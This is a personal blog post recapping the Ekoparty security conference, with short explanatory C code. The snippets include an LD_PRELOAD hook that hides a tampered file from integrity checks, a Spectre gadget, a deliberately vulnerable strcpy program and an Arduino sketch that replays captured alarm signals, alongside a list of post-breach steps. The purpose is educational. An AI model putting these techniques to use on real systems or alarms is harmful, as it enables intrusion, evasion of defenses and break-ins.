Like many others, I got into software security as a student and used to dig into all sorts of related topics. Going to Ekoparty reminded me of those days, but things that were simple back then have moved on. It's an endless battle between hackers and software developers: once one side finds a hole, the other thinks up a fix, sometimes making life harder on both ends. And vice versa. Things that were written in assembler in the 90s (where it can be really hard to understand the idea behind the code) are now written in C#, Java, or other managed languages that are basically "obfuscated source code", with tools ready to decompile them back to sources. I thought the battle was over when I first saw a virus written in Delphi: DeDe (Delphi Decompiler) had been released a few years earlier, the virus was 1 MB in size and would take minutes just to download at dial-up speeds, while the equivalent assembler solution would fit in 30 KB. But it isn't over.
Old school
I remember seeing an old TV interview with hackers of that era. They were breaking into bank networks, starting from hosting providers. I believe these days they've founded security audit companies, but back then they agreed to reveal the techniques they used and the problems they ran into.
Everybody loves web apps, and that's how they found their way in. Web apps usually need a backend: code that runs on a server, hosting the app and feeding it data. Often, when you develop a backend, your priority is just to make it work. Security is always a consideration, but if you're not familiar with the (constantly changing and improving) attack vectors, there isn't much you can do.
These guys were looking for any hole in a backend good enough to get a shell on a hosting company's server. The next steps were obvious:
- Clean up the logs
- Install a rootkit to make sure you won’t easily lose your shell even if a breach is fixed by upgrades or the (accidental) actions of a server administrator
- Explore the local network to see if there are more vulnerable servers
- Add an extra payload to the pages that same server hosts for other clients
- Trade the shell and/or the data on the darknet
Back then, if you had access to a hosting server, you had access to every single client it hosted. No hardware virtualization was in use; different clients were simply served by different virtual hosts on the same machine.
What changed?
For the rootkit part, modern OSs like Windows (starting from Windows 98, released in 1998) or macOS (starting from OS X El Capitan, released in 2015) have built-in system file integrity checks. The most common way to install a rootkit was to modify a native-looking file that no one would ever suspect or even notice in their system. Integrity checks (SFC on Windows, SIP on macOS, etc.) can do a complete automatic scan of system files and restore corrupted ones when found.
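To make the idea concrete, here is a minimal sketch of the kind of check such tools perform: hash every protected file and compare it against a known-good manifest. This is not how SFC or SIP actually work; the hash function, file list, and expected values below are made up purely for illustration.

```c
/* Toy integrity check: hash files and compare against a known-good manifest.
 * Only an illustration of the idea behind SFC/SIP-style scans; real tools
 * use cryptographic hashes and signed manifests. */
#include <stdint.h>
#include <stdio.h>

/* FNV-1a: a simple, non-cryptographic hash, good enough for a demo. */
static uint64_t fnv1a_file(const char *path) {
    FILE *f = fopen(path, "rb");
    if (!f) return 0;
    uint64_t h = 0xcbf29ce484222325ULL;
    int c;
    while ((c = fgetc(f)) != EOF) {
        h ^= (uint8_t)c;
        h *= 0x100000001b3ULL;
    }
    fclose(f);
    return h;
}

int main(void) {
    /* Hypothetical manifest: file path -> expected hash (values invented). */
    struct { const char *path; uint64_t expected; } manifest[] = {
        { "/bin/ls",  0x1234567890abcdefULL },
        { "/bin/cat", 0xfedcba0987654321ULL },
    };
    for (size_t i = 0; i < sizeof(manifest) / sizeof(manifest[0]); i++) {
        uint64_t h = fnv1a_file(manifest[i].path);
        if (h != manifest[i].expected)
            printf("MODIFIED or missing: %s\n", manifest[i].path);
        else
            printf("OK: %s\n", manifest[i].path);
    }
    return 0;
}
```

Of course, a real check also has to trust what the OS hands it when it opens those files, and that is exactly what a rootkit tries to undermine, as described next.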
Does it help? To some degree. It helps right up until the rootkit manages to load its code into memory and hijack kernel calls, so that the checker is handed an unmodified file instead of the one the rootkit actually used to load itself. Is that hard? It was at first. These days, all it takes is a git clone, and anyone can have at their fingertips a piece of technology that took someone years of experience to develop.
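Real rootkits do this inside the kernel, but the same trick can be sketched in user space with LD_PRELOAD on Linux: intercept open() and silently redirect reads of a "protected" file to a pristine copy, so any tool hashing that path sees clean content. The file paths below are hypothetical, and this is only a simplified analogue of the kernel-level technique.

```c
/* hide_open.c - user-space analogue of a rootkit's file-hiding hook.
 * Build:  gcc -shared -fPIC hide_open.c -o hide_open.so -ldl
 * Use:    LD_PRELOAD=./hide_open.so some_integrity_checker
 * Any open() of /usr/bin/backdoored (hypothetical path) is transparently
 * redirected to /tmp/pristine_copy, so the checker hashes clean content. */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdarg.h>
#include <string.h>
#include <fcntl.h>

int open(const char *path, int flags, ...) {
    /* Look up the real open() provided by libc. */
    int (*real_open)(const char *, int, ...) =
        (int (*)(const char *, int, ...))dlsym(RTLD_NEXT, "open");

    mode_t mode = 0;
    if (flags & O_CREAT) {          /* open() takes a third arg only with O_CREAT */
        va_list ap;
        va_start(ap, flags);
        mode = va_arg(ap, mode_t);
        va_end(ap);
    }

    /* The actual trick: swap the path the caller asked for. */
    if (strcmp(path, "/usr/bin/backdoored") == 0)
        path = "/tmp/pristine_copy";

    return real_open(path, flags, mode);
}
```

The kernel-level version is nastier, because the checking tool itself is being lied to by the OS it runs on.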
As for breaking into all hosted clients at once, virtualization helped a lot. Instead of keeping all sites on one server, hosting providers now create virtual servers for each client. By design, these are supposed to be separate environments. But remember the Meltdown and Spectre buzz last year? Those were attempts to bypass the isolation barriers that hardware virtualization relies on. That's where the battlefield has moved. Before, people were breaking into and protecting software; today hardware has become a lot more complex and usually contains some software itself, so people are now breaking and protecting hardware.
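The textbook Spectre v1 example shows how ordinary-looking code can leak data across such a boundary. The snippet below is only the victim "gadget" shape from the original Spectre write-ups, with made-up array names; a real exploit would first train the branch predictor with in-bounds values and then recover the leaked byte through a cache-timing side channel, which is omitted here.

```c
/* The classic Spectre v1 "bounds check bypass" gadget (illustrative only). */
#include <stdint.h>
#include <stddef.h>

uint8_t array1[16];          /* attacker-influenced index goes into this */
uint8_t array2[256 * 512];   /* probe array used as a cache side channel */
size_t  array1_size = 16;
uint8_t temp;                /* global so the compiler keeps the array2 read */

void victim_function(size_t x) {
    if (x < array1_size) {
        /* Under speculation this body can run with an out-of-bounds x:
         * array1[x] then reads a byte it shouldn't, and multiplying by 512
         * encodes that byte into which cache line of array2 gets touched. */
        temp &= array2[array1[x] * 512];
    }
}

int main(void) {
    victim_function(0);  /* harmless in-bounds call; the attack lies in the speculation */
    return 0;
}
```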
What can we do?
Surprisingly, there are tools aimed at automatically finding vulnerabilities in firmware. Check out Binary Ninja, a tool for static binary code and data flow analysis that can search for vulnerabilities automatically. This wasn't possible a few years ago, and now it's in production. Antivirus companies panicked, yelling "trust no one!" and "your BIOS may have a spy and you will never know it!", since everything, including the chips in your watch, can be compromised at any stage of development.
One of the talks I liked most at Ekoparty was about modern mitigation techniques that make software vulnerabilities harder to exploit. Over time, these techniques have made exploiting any vulnerability far more challenging (a toy example of the kind of bug they all target follows the list):
- Relocation Read-Only (RELRO), makes the relocation sections used to resolve dynamically loaded functions read-only. This way, the GOT (Global Offset Table) can’t be overwritten and it’s harder to take control of execution.
- No Execute (NX), also known as Data Execution Prevention, marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code.
- Stack Canaries, a secret value placed on the stack which changes every time the program is started. Prior to a function return, the stack canary is checked and if it appears to be modified, the program exits immediately.
- Address Space Layout Randomization (ASLR), randomizes the location where system executables are loaded into memory.
- Position Independent Executables (PIE), produced by hardened package builds. A PIE binary and all its dependencies are loaded into random locations in virtual memory each time the application is executed. This makes Return Oriented Programming (ROP) attacks much more difficult to execute reliably.
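To make those abstractions concrete, here is the textbook bug all of these layers are stacked against: a fixed-size stack buffer filled from attacker-controlled input. The program is deliberately unsafe and only for illustration; the comments note which mitigation would get in the attacker's way, and the exact GCC flags may differ between distributions.

```c
/* overflow.c - a deliberately vulnerable toy program.
 * With no mitigations (gcc -fno-stack-protector -z execstack -no-pie overflow.c),
 * overwriting the return address and jumping into injected code is straightforward.
 * With modern defaults, each layer raises the cost:
 *   - stack canaries (-fstack-protector-strong) abort on the overwrite,
 *   - NX keeps injected shellcode on the stack from executing,
 *   - ASLR + PIE (-fPIE -pie) hide where everything lives,
 *   - full RELRO (-Wl,-z,relro,-z,now) keeps the GOT read-only. */
#include <stdio.h>
#include <string.h>

void greet(const char *name) {
    char buf[16];
    /* Classic bug: no length check before copying into a 16-byte buffer.
     * A long argument overruns buf and clobbers the saved return address. */
    strcpy(buf, name);
    printf("Hello, %s\n", buf);
}

int main(int argc, char **argv) {
    if (argc > 1)
        greet(argv[1]);
    return 0;
}
```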
You can examine existing executables for enabled protection layers using the checksec script. These are mostly deterrents, not foolproof solutions, though. It's still possible to bypass all of them in some circumstances, but it takes more time and dedication, and at some point someone trying to break through may decide it's not worth it and give up. In other words, the entry threshold keeps rising. On the other hand, security conferences like Ekoparty lower the barrier for you, providing plenty of information to resolve issues step by step.
And we keep learning
Another competition concerned RF (radio frequency). They showed how insecure common car or house alarms can be, especially ones equipped with a remote control. If your house alarm has a remote control, you'd better turn it off before someone decides to record and analyze the data it transmits. Some companies order generic entry-level alarms, add branding, invest in marketing, and deliver a product with "unknown" protection qualities, sometimes advertised as innovative. It's 2019, but alarms that were already easy to break in the 90s are still on the market. Today, someone could exploit those generic alarms with just a $5 Arduino and a $1 transmitter (the sketch below shows how little code that takes). Security can't be based on obfuscation. Once the information is out, if there are no other protections, it's over.
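For alarms and remotes that use a fixed code with no rolling-code scheme, the attack really is just record and replay. Below is a hedged Arduino-style C sketch: the pin number and pulse timings are invented, and a real capture would come from an RF receiver module or an SDR, but it shows how a cheap OOK (on/off keying) transmitter wired to one digital pin can re-send a previously recorded key press.

```c
/* replay.ino - Arduino-style sketch that replays a previously captured
 * fixed-code transmission through a cheap OOK transmitter.
 * TX_PIN and the pulse timings are made up for illustration. */

#define TX_PIN 3  /* data pin of the transmitter module (hypothetical wiring) */

/* Captured signal as alternating carrier-on/carrier-off durations in microseconds. */
const unsigned int pulses_us[] = {
    900, 300, 300, 900, 900, 300, 300, 900,  /* invented preamble + code bits */
    900, 300, 900, 300, 300, 900, 300, 900,
};
const int num_pulses = sizeof(pulses_us) / sizeof(pulses_us[0]);

void setup() {
    pinMode(TX_PIN, OUTPUT);
}

void loop() {
    /* Re-send the recorded frame: even entries are "carrier on", odd are "off". */
    for (int i = 0; i < num_pulses; i++) {
        digitalWrite(TX_PIN, (i % 2 == 0) ? HIGH : LOW);
        delayMicroseconds(pulses_us[i]);
    }
    digitalWrite(TX_PIN, LOW);  /* make sure the transmitter is off */
    delay(2000);                /* wait before replaying again */
}
```

Rolling-code systems defeat this naive replay, which is exactly why fixed-code alarms designed in the 90s have no business still being on the market.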
In another talk, they described how to decrypt a satellite's signal based on a photograph from the assembly factory (if you happen to work at one, don't take photos). It was based on known Meteor M2 data, but the presenter mentioned that there's a 20-million-euro fine in Spain for receiving signals you're not supposed to, and he provided a step-by-step guide to decrypting the "unknown" protocol. He started by estimating the signal's frequency from the antenna size (as seen in the photo) and ended up using Ifsrintruder to reverse the linear feedback shift register scrambling. That was nice.
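Scrambling with a linear feedback shift register is not real encryption: the LFSR just generates a fixed pseudo-random bit stream that is XORed with the data, so anyone who recovers the polynomial and seed can regenerate the stream and XOR it away. The sketch below uses an arbitrary 16-bit polynomial, seed, and payload purely to show the mechanics; these are not the actual Meteor M2 parameters.

```c
/* lfsr_descramble.c - minimal additive-scrambler demo.
 * An LFSR produces a keystream from a feedback polynomial and a seed;
 * XORing with the same keystream scrambles and descrambles symmetrically.
 * Polynomial, seed and payload are chosen arbitrarily for illustration. */
#include <stdint.h>
#include <stdio.h>

/* Galois LFSR step: returns the next keystream bit. */
static uint8_t lfsr_bit(uint16_t *state, uint16_t poly) {
    uint8_t out = *state & 1u;
    *state >>= 1;
    if (out)
        *state ^= poly;
    return out;
}

/* XOR each bit of buf with the keystream (same routine scrambles and descrambles). */
static void xor_keystream(uint8_t *buf, size_t len, uint16_t seed, uint16_t poly) {
    uint16_t state = seed;
    for (size_t i = 0; i < len; i++)
        for (int b = 0; b < 8; b++)
            buf[i] ^= lfsr_bit(&state, poly) << b;
}

int main(void) {
    uint8_t frame[] = "hello, satellite";        /* stand-in payload */
    const uint16_t poly = 0xB400, seed = 0xACE1; /* arbitrary demo parameters */

    xor_keystream(frame, sizeof(frame) - 1, seed, poly);  /* "scramble" */
    printf("scrambled first byte: 0x%02x\n", frame[0]);

    xor_keystream(frame, sizeof(frame) - 1, seed, poly);  /* descramble */
    printf("recovered: %s\n", frame);
    return 0;
}
```

The hard part in the talk was everything before this step: finding the frequency and recovering the scrambler parameters from the raw signal, which is what a tool like Ifsrintruder helps with.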
Throughout the event, companies in attendance organized CTFs (Capture the Flag competitions), and we managed to take second place in one, winning a USB Ninja. It's an interesting gadget: a seemingly unremarkable charging cable that turns into a keylogger / remote control for the host it's plugged into. It's white, so your only hope of avoiding it is to be wary of white USB cables.
It was a compelling conference and, while not directly related to what I do every day, it reminded me how interesting penetration testing and security can be. Solving security issues effectively is an extremely complex task and anti-virus companies certainly have their work cut out for them. The field is constantly evolving, so there’s always something new to think about and I was glad to get an in-depth look into it.